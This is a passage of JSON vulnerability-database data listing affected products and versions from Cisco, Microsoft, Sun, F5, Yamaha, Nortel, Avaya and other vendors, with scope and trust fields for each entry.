        "model": "cms server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "16.1"
      },
      {
        "model": "windows datacenter server sp4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "opensolaris build snv 110",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "bigip local traffic manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "9.6"
      },
      {
        "model": "ios 12.2sga",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.6(15)"
      },
      {
        "model": "windows datacenter server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "rt60w",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "yamaha",
        "version": "0"
      },
      {
        "model": "ios 12.1dc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows server for itanium-based systems sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2008"
      },
      {
        "model": "networks switched firewall sfa-6600",
        "scope": null,
        "trust": 0.3,
        "vendor": "nortel",
        "version": null
      },
      {
        "model": "enterprise manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "1.0"
      },
      {
        "model": "interactive response",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "4.0"
      },
      {
        "model": "ios 12.0sl",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.2(2)"
      },
      {
        "model": "windows server itanium sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "windows server sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "ios 12.2sxh",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "rt140p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "yamaha",
        "version": "0"
      },
      {
        "model": "ios 12.2xk",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2 sm5",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "bigip local traffic manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "9.4"
      },
      {
        "model": "ios 12.1eu",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.4 sw3",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "messaging application server mm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "1.1"
      },
      {
        "model": "ios 12.3jeb",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "bigip application security manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "9.3"
      },
      {
        "model": "windows vista ultimate",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows server for 32-bit systems sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2008"
      },
      {
        "model": "networks secure network access switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "-40700"
      },
      {
        "model": "ios 12.1xt",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "networks callpilot 201i",
        "scope": null,
        "trust": 0.3,
        "vendor": "nortel",
        "version": null
      },
      {
        "model": "ios 12.4 xy4",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2mc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0sy",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.4 yd",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2 se",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows vista home premium",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "wanjet",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "5.0"
      },
      {
        "model": "linux enterprise desktop sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "coat systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "blue",
        "version": "4.2.2.4"
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.4(2)"
      },
      {
        "model": "enterprise manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "1.2"
      },
      {
        "model": "ios 12.2 sq2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "rt105",
        "scope": null,
        "trust": 0.3,
        "vendor": "yamaha",
        "version": null
      },
      {
        "model": "coat systems proxysg",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "blue",
        "version": "4.3"
      },
      {
        "model": "opensolaris build snv 122",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "ios 12.1yh",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensolaris build snv 131",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "ios 12.2sx",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensolaris build snv 109",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.6(5)"
      },
      {
        "model": "netscaler build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "9.070.5"
      },
      {
        "model": "ios 12.0sz",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.5(2)"
      },
      {
        "model": "ios 12.2 se5",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "point vpn-1 pro/express r65 ipso ga",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "check",
        "version": "6"
      },
      {
        "model": "ios 12.3yu",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "networks self-service mps",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "10000"
      },
      {
        "model": "ios 12.1ya",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "enterprise manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "1.8"
      },
      {
        "model": "bigip global traffic manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.0"
      },
      {
        "model": "ios 12.3xa",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0sc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xg",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.6(10)"
      },
      {
        "model": "point vpn-1 pro/express r65 hfa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "check",
        "version": "50"
      },
      {
        "model": "netscaler",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "8.1.68.7"
      },
      {
        "model": "ios 12.4xb",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensolaris build snv 102",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "ios 12.1ey",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "solaris 9 sparc",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "opensolaris build snv 02",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "ios 12.3eu",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows vista ultimate 64-bit edition sp1",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "ios 12.2su",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "enterprise manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "1.4.1"
      },
      {
        "model": "point software connectra r62 hfa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "check",
        "version": "01"
      },
      {
        "model": "ios 12.4xw",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2sca",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows datacenter server sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "ios 12.2sef",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2ew",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0 sz10",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "bigip local traffic manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "9.3.5"
      },
      {
        "model": "ios 12.1xz",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.4xm",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "rt105e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "yamaha",
        "version": "0"
      },
      {
        "model": "opensolaris build snv 80",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "ios 12.4sw",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "rt140f",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "yamaha",
        "version": "0"
      },
      {
        "model": "ios 12.2se",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "bigip psm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.0.1"
      },
      {
        "model": "networks contact center administration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "0"
      },
      {
        "model": "ios 12.1eo",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.4 ya2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensolaris build snv 104",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "ios 12.3yk",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "coat systems proxysg 8100-c",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "blue",
        "version": "0"
      },
      {
        "model": "ios 12.2yh",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "networks callpilot 202i",
        "scope": null,
        "trust": 0.3,
        "vendor": "nortel",
        "version": null
      },
      {
        "model": "windows professional sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2000"
      },
      {
        "model": "ios 12.3xu",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0w",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "10.1"
      },
      {
        "model": "rt56v",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "yamaha",
        "version": "0"
      },
      {
        "model": "linux enterprise server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "opensolaris build snv 38",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.6(19)"
      },
      {
        "model": "ios 12.2 ixh",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1xd",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "linux enterprise server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "ios 12.2yz",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "networks callpilot 1002rp",
        "scope": null,
        "trust": 0.3,
        "vendor": "nortel",
        "version": null
      },
      {
        "model": "ios 12.2sxe",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensolaris build snv 129",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.6(16)"
      },
      {
        "model": "ios 12.4 md2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "coat systems proxysg",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "blue",
        "version": "4.2.1.6"
      },
      {
        "model": "ios 12.2 se2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.4 jdd",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "networks contact center ncc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "0"
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.5(1)"
      },
      {
        "model": "ios 12.2xt",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "networks contact center cct",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "-0"
      },
      {
        "model": "ios 12.2scb",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "rtw65i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "yamaha",
        "version": "0"
      },
      {
        "model": "networks ethernet routing switch 4548gt-pwr",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "4500"
      },
      {
        "model": "ios 12.1xc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.4 mr2",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.2(0.65)"
      },
      {
        "model": "networks switched firewall sf-5109",
        "scope": null,
        "trust": 0.3,
        "vendor": "nortel",
        "version": null
      },
      {
        "model": "stonegate ssl vpn engine",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "stonesoft",
        "version": "1.1"
      },
      {
        "model": "networks self-service peri ivr",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "0"
      },
      {
        "model": "ios 12.2zy",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "bigip global traffic manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "9.4"
      },
      {
        "model": "bigip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.0.1"
      },
      {
        "model": "ios 12.2 srb5a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows vista sp1",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "networks self-service wvads",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "0"
      },
      {
        "model": "ios 12.2sve",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2irc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.6(1)"
      },
      {
        "model": "windows server web edition sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "ios 12.3 ym13",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.4 jx",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0 sy8",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2yo",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2ys",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.4xq",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensolaris build snv 84",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.3(2)"
      },
      {
        "model": "ios 12.2 sb14",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2 sb13",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "messaging application server mm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.0"
      },
      {
        "model": "ios 12.2zj",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "stonegate high availability firewall and vpn",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "stonesoft",
        "version": "4.2.2"
      },
      {
        "model": "ios 12.2mb",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "linux enterprise server sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "ios 12.2ex",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2yl",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows xp media center edition sp2",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "ios 12.1ew",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0wt",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.0 s3",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.4 xr",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensolaris build snv 98",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "ios 12.2xnb",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "rta55i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "yamaha",
        "version": "0"
      },
      {
        "model": "ios 12.1ax",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2 da14",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2xd",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.3xj",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows server datacenter edition itanium",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20030"
      },
      {
        "model": "opensolaris build snv 117",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "messaging application server mm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "3.1"
      },
      {
        "model": "ios 12.2yc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensolaris build snv 58",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "networks contact center manager",
        "scope": null,
        "trust": 0.3,
        "vendor": "nortel",
        "version": null
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "7.6(7)"
      },
      {
        "model": "ios 12.2sv",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows vista home basic sp2",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "ios 12.2xh",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1ye",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "bigip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "9.4"
      },
      {
        "model": "ios 12.2srd",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "bigip wan optimization module",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.0.1"
      },
      {
        "model": "ios 12.2sva",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "networks self-service speech server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "0"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "50000"
      },
      {
        "model": "opensolaris build snv 22",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "networks contact center tapi server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "-0"
      },
      {
        "model": "ios 12.0 sy9a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensolaris build snv 81",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "ios 12.3xr",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "stonegate high availability firewall and vpn",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "stonesoft",
        "version": "4.2.10"
      },
      {
        "model": "ios 12.2bz",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "bigip application security manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "9.4"
      },
      {
        "model": "opensolaris build snv 103",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "windows server sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003x64"
      },
      {
        "model": "coat systems proxysg",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "blue",
        "version": "5.2"
      },
      {
        "model": "ios 12.3xy",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2sxi",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "linux enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "ios 12.2 sg",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2ym",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "networks contact center multimedia \u0026 outbound",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "6.0"
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.5(3)"
      },
      {
        "model": "ios 12.0t",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "linux enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "rta52i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "yamaha",
        "version": "0"
      },
      {
        "model": "ios 12.4ya",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.4xf",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "stonegate ips sensor and analyzer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "stonesoft",
        "version": "4.2"
      },
      {
        "model": "ios 12.2xq",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "networks ethernet routing switch 4526t",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "4500"
      },
      {
        "model": "rtx1200",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "yamaha",
        "version": "0"
      },
      {
        "model": "networks secure network access identity engines ignition server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "nortel",
        "version": "-0"
      },
      {
        "model": "nx-os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "4.1(4)"
      },
      {
        "model": "windows vista enterprise",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "ios 12.2ste",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows server standard edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "ios 12.2cz",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1yb",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.1t",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.4jl",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows vista ultimate sp1",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "ios 12.2yw",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2zf",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2xn",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2sxd",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "rtw65b",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "yamaha",
        "version": "0"
      },
      {
        "model": "windows vista home premium 64-bit edition sp1",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "ios 12.2 zya1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "windows server enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003x64"
      },
      {
        "model": "ios 12.2xf",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "opensolaris build snv 13",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "cms server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "16.2"
      },
      {
        "model": "catos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "8.1"
      },
      {
        "model": "access gateway enterprise edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "9.1"
      },
      {
        "model": "opensolaris build snv 91",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "ios 12.2 scb1",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sun",
        "version": "10"
      },
      {
        "model": "ios 12.3tpc",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2yq",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.2ya",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios 12.3jed",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
